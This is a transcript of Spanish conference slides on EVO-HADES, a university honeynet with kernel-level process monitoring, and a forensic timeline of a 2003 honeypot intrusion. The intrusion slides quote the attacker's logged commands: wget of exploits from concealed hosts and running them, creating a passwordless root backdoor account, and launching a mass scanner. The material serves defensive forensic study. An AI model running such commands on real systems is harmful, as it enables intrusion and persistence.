EVO-HADES: Arquitectura para la monitorización y análisis forense Jesús Damián Jiménez Re...
-
Upload
anbessa-sison -
Category
Documents
-
view
11 -
download
5
Transcript of EVO-HADES: Arquitectura para la monitorización y análisis forense Jesús Damián Jiménez Re...
EVO-HADES: Arquitectura para la monitorización y análisis forense
Jesús Damián Jiménez Re <[email protected]>Universidad de Murcia
2 / 30
Contenido
1. Objetivos2. Infraestructura de red3. Monitorización de procesos4. Análisis de una Intrusión5. Conclusiones
3 / 30
Contenido
1. Objetivos2. Infraestructura de red3. Monitorización de procesos4. Análisis de una Intrusión5. Conclusiones
4 / 30
1. Objetivos
Ámbito de actuación: Evolución del sistema HADES Proyecto fin de carrera desarrollado
en la Universidad de Murcia En colaboración con el proyecto de
máquinas trampa de RedIRIS
5 / 30
1. Objetivos Objetivo:
Diseño de una arquitectura de red que permita:
FASE 1Diseño Infraestructura de red
(Hardware / Software)
FASE 2Diseño herramientas
monitorización
Modificaciones a nivel S.O:- Módulo control
- Modificación del syslogd
FASE 3Análisis de unaintrusión real
- Máquina de análisis- Descripción de nuevas
herramientas
SISTEMA HoneyNET conequipo trampa
-Paquete de Instalación- Utilidades deconfiguración
1. Descubrirvulnerabilidades
3. Obtener informaciónde las máquinas
2. Facilitar puesta enmarcha
4. Análisis Forense
6 / 30
Contenido
1. Objetivos
2. Infraestructura de red3. Monitorización de procesos4. Análisis de una Intrusión5. Conclusiones
7 / 30
2. Infraestructura de redBasada en los sistemas HoneyNET
Separación entre:• Subred de control• Subred trampa• Subred corporativa
Máquina de control:• Conectada
físicamente a la subred trampa, pero sin interfaz de red en ella
• Modo puente• Activado filtrado
paquetes (firewall)
Com3
Hub
Com3
Switch
Máquina Trampa
Máquina Trampa
Subred de control
Subred “física”máquinas trampa
INTERNET
Puente
Subred Corporativa
Máquina control
Com3
Switch
Servidor Web
Servidor Correo
Firewall
Máquina Análisis
Adm. Máquina control
Com3
Switch
3Com
Router
8 / 30
2. Infraestructura de red
Máquina de control Paquete RPM para la instalación del modo puente +
firewall Configuración del filtrado/captura de equipos trampa
mediante ficheros de configuración:# Ejemplo de fichero de configuración de PED-CONTROL
# Maquinas cuyo tráfico se desea capturar:155.54.XX.YY captura
# Maquinas cuyo tráfico se desea filtrar:155.54.ZZ.TT filtra
Inicio y parada del puente+firewall con comandos start/stop. Comprobación periódica del tamaño de los ficheros de captura
Envío de e-mail de alerta Filtrado de tráfico para evitar ataques al exterior
9 / 30
2. Infraestructura de red Máquinas trampa
Se han habilitado los servicios habituales en una organización:
FTP telnet SSH Servidor Web Proxy …
10 / 30
Contenido
1. Objetivos2. Infraestructura de red
3. Monitorización de procesos
4. Análisis de una Intrusión5. Conclusiones
11 / 30
3. Monitorización de procesos Existen ocasiones en las que están
implicadas conexiones encriptadas entre el equipo trampa y el atacante
Ejemplo: El atacante instala una versión modificada del servidor OpenSSH (sshd).
Máquina TrampaINTERNET
Máquina Control
Com3
Hub
Tráfico cifrado (SSH)
AtacanteTráfico capturado ..¿?
No es posible la visualización mediante el análisis del tráfico de la red
12 / 30
3. Monitorización de procesos Solución: Modificaciones a nivel del sistema
operativo para el envío remoto de: Procesos/comandos ejecutados
Implantación de un módulo a nivel del kernel de Linux que envía información a la máquina de control
Com3
Hub
Máquina Trampa
Máquina control
Información comandos ejecutados
13 / 30
3. Monitorización de procesos
Módulo para la monitorización Técnica
Se interceptan las llamadas al sistema provocadas por los procesos
Se ejecuta el código original, más: El nuevo código, que en nuestro
caso envía una trama UDP con el proceso ejecutado
El tráfico generado por el módulo será capturado por la máquina de control, junto al resto del tráfico de la máquina
ESPACIO USUARIO
kernel de LINUX
Llamadas alsistema
Módulo decontrol
sys_*()
Programas
14 / 30
Contenido
1. Objetivos2. Infraestructura de red3. Monitorización de procesos
4. Análisis de una Intrusión5. Conclusiones
15 / 30
4. Análisis de una intrusión Objetivos del análisis
Detectar nuevos patrones de ataque y las herramientas utilizadas para ello
Obtener pruebas que justifiquen posibles acciones legales sobre el atacante
Estudio de nuevas herramientas The Sleuth Kit y Autopsy Forensic Browser
16 / 30
4. Análisis de una intrusión Metodología:
Se utiliza la suma de 3 técnicas:
AnálisisForense
Análisis deltráfico de
red
Análisis deprocesos
ANÁLISIS DE UNA INTRUSIÓN
Información suministradapor el módulo de control
Capturado por la máquinade controlImágenes del disco duro
Toda esta información (imágenes + capturas) es pasada a la máquina de análisis para su estudio
17 / 30
4. Análisis de una intrusión Descripción de la máquina atacada
Nombre (ficticio): ped.um.es Linux Red Hat 7.2 Puesta en red: 29 de Mayo de 2003. Se descubre que ha sido atacada el
día 31 de Mayo del 2003. Se “permite” el acceso monitorizado
a la máquina durante 11 días (hasta el día 10 de Junio de 2003).
18 / 30
4. Análisis de una intrusión
Máquina TrampaINTERNET
Máquina Control
Com3
Hub
Máquina Adm. control
Organización
Tráfico HTTPS
e-mail alerta
Atacante
1. ATAQUE Y ENTRADA AL SISTEMA
Se detecta un aumento del tráfico HTTPS
Se recibe un correo electrónico de alerta
From: [email protected]: [email protected]: aumento de 543 K en el trafico de 155.54.XX.YY---------A las 20:15:00 el equipo de control control.um.esha detectado un aumento de 543 K en el tráfico conorigen o destino la máquina PED 155.54.XX.YY
1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
19 / 30
4. Análisis de una intrusión Análisis de tráfico
Se ha aprovechado una vulnerabilidad en la llave del protocolo OpenSSL y el servidor Apache.
Esto permite iniciar un shell con permisos de Apache.
En las conexiones posteriores al tráfico HTTPS, se descubre la descarga de diversos ficheros binarios
Análisis forense: Se analizan los ficheros descargados:
Exploit pt: Abre un shell con privilegios de root. Se aprovecha de una vulnerabilidad de los kernel 2.4.X en la llamada al sistema ptrace (buffer overflow).
1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
20 / 30
4. Análisis de una intrusión
Máquina TrampaINTERNET
Máquina Control
Com3
Hub
Máquina Adm. control
Organización
Máquina controlada remotamente
Atacante
2. INSTALACIÓN DE ROOTKIT’s
Servidor web remoto
- SuckIT - Pandora
Análisis del tráfico: Instalación del rootkit SuckIT en el directorio “/usr/lib/…”:
Sat May 31 2003 20:08:01 4096 .a. d/drwxr-xr-x root/user root 145543 /usr/lib/… 65928 ..c -/-rw-r—r-- root/user root 145544 /usr/lib/…/sk.tgz
SuckIT basa su funcionamiento en módulo del núcleo: Oculta PID’s, ficheros, conexiones tcp/udp/socket raw. Integra un shell TTY para el acceso remoto.
1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
21 / 30
4. Análisis de una intrusión1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
INTERNET Máquina Trampa
Máquina Control
Com3
Hub
Máquina Adm. control
Organización
fichero /tmp/httpd
Atacante
3. SEGUNDO ATAQUE AL SISTEMA
No se registra actividad en la máquina hasta el día 3 de Junio Análisis de tráfico:
Se sube mediante el servidor web el fichero /tmp/httpd y se ejecuta:
Tue Jun 03 2003 21:16:44 21182 ..c -/-rwxr-xr-x apache apache 62724 /tmp/httpd 21182 .a. -/-rwxr-xr-x apache apache 62724 /tmp/httpd
.
22 / 30
4. Análisis de una intrusión1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
Análisis forense: /tmp/httpd crea un terminal para la ejecución de
comandos, con UID de Apache (48). Análisis de procesos (módulo):
Para hacerse con permisos de root, el atacante vuelve a descargar el exploit utilizado para el primer ataque (con otro nombre diferente):
21:17:50-2003/06/03 [48:sh:26217:ttyp] cd /tmp
21:18:37-2003/06/03 [48:sh:26217:ttyp] wget direccIPoculta/ozn/abc/prt
21:19:25-2003/06/03 [48:sh:26217:ttyp] chmod +x prt
21:19:27-2003/06/03 [48:sh:26217:ttyp] ./prt
Para asegurarse una entrada posterior al sistema: 21:19:34-2003/06/03 [0:sh:26223:ttyp] /usr/sbin/useradd pwd 21:20:09-2003/06/03 [0:sh:26223:ttyp] passwd –d pwd
23 / 30
4. Análisis de una intrusión1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
Máquina TrampaINTERNET
Máquina Control
Com3
Hub
Máquina Adm. control
Organización
Máquina controlada remotamente
Atacante
4. INSTALACIÓN DE UN PROXY IRC (BOUNCER)
Servidor web remoto
- psyBNC
El atacante instala utilidades para aprovechar la máquina atacada Análisis forense:
Se instala un proxy IRC llamado psyBNC: Permite ocultar la IP real a los usuarios del proxy. Mantiene la conexión a IRC aunque se desconecte el cliente
24 / 30
4. Análisis de una intrusión1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
Máquina TrampaINTERNET
Máquina Control
Com3
Hub
Máquina Adm. control
Organización
Máquina controlada remotamente
Atacante
5. HACIENDO “SUYO” EL SISTEMA
Servidor web remoto
- sslSTOP.tgz
El atacante quiere evitar que otros “atacantes” aprovechen la vulnerabilidad que él ha aprovechado para entrar al sistema
Análisis forense: Se instala el paquete sslstop.tgz, que contiene dos script:
sslstop: Detiene el soporte SSL para Apache sslport: Cambia el puerto SSL por defecto de la máquina
25 / 30
4. Análisis de una intrusión1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
Máquina TrampaINTERNET
Máquina Control
Com3
Hub
Máquina Adm. control
Organización
Máquina controlada remotamente
Atacante
6. SESIONES DE IRC
red IRC: undernet.org
Conexión a las redes IRC en modo proxy
Desde el día 3 de Junio hasta el día 6 de Junio: Conexiones de IRC Las conversaciones han quedado registradas en el tráfico
capturado de la máquina atacada Se han reconstruido algunas con ethereal.
26 / 30
4. Análisis de una intrusión1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
Máquina TrampaINTERNET
Máquina Control
Com3
Hub
Máquina Adm. control
Organización
Máquina controlada remotamente
Atacante
7. INTENTO DE ATAQUE A OTRAS MÁQUINAS
Subredes víctimas(se busca el fallo en OpenSSL)
mass (scanner)
Tras mantener la máquina comprometida con éxito 7 días, el atacante considera la máquina “fiable”:
Instalación de herramientas para utilizar esta máquina como puente para el ataque a otras:
Se instala el exploit con el que se atacó a esta máquina (openssl-too-open). Scanner de puertos
27 / 30
4. Análisis de una intrusión1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
Análisis de la información del módulo: Descarga del exploit openssl-too-open
(http.tgz). 03:52:31-2003/06/06 [0:bash:4064:pts] cd /etc 03:52:33-2003/06/06 [0:bash:4064:pts] mkdir .” “ 03:52:34-2003/06/06 [0:bash:4064:pts] cd .” “ 03:52:51-2003/06/06 [0:bash:4064:pts] wget
dirIPoculta/valisie/http.tgz
Descarga y ejecución del scanner mass 11:58:08-2003/06/06 [0:bash:4713:pts] wget
dirIPoculta/valisie/mass.tgz 11:58:17-2003/06/06 [0:bash:4713:pts] tar xvzf mass.tgz 11:58:20-2003/06/06 [0:bash:4713:pts] cd mass 11:58:22-2003/06/06 [0:bash:4713:pts] ./mass –b 67.0.*.* -s 800
Los filtros aplicados en la máquina de control hacen que estos escaneos no tengan éxito.
28 / 30
4. Análisis de una intrusión1. ENTRADA AL SISTEMA
2. INSTALACIÓN DE ROOTKIT’s
3. SEGUNDO ATAQUE ALEQUIPO
4. INSTALACION DE UNBOUNCER
5. HACIENDO SUYO ELSISTEMA
6. SESIONES DE IRC
7. ATAQUE A OTRASMÁQUINAS
Máquina TrampaINTERNET
Máquina Control
Com3
Hub
Máquina Adm. control
Organización
Atacante
DESCONEXIÓN DE LA MÁQUINAMáquina controlada remotamente
El día 10 de Junio se decide que ya se ha obtenido suficiente información del atacante.
Se aplican el filtrado total a través de la máquina de control. Se apaga la máquina y se desconecta de la red.
29 / 30
Contenido
1. Objetivos2. Infraestructura de red3. Monitorización de procesos4. Análisis de una Intrusión
5. Conclusiones
30 / 30
5. Conclusiones Se permite la detección de nuevos tipos y
herramientas de ataque sin poner en riesgo los equipos actuales de la organización
Con la monitorización de procesos remota: Es fácil ver lo que está sucediendo en la máquina
atacada sin tener que cortar la conexión Se obtiene información que no sería posible con las
otras técnicas Complementa al análisis forense y análisis del tráfico
Vías futuras: Migración de la arquitectura para dar soporte a IPv6 Portar el módulo a otros sistemas operativos Desarrollo de un sistema de aviso de ataques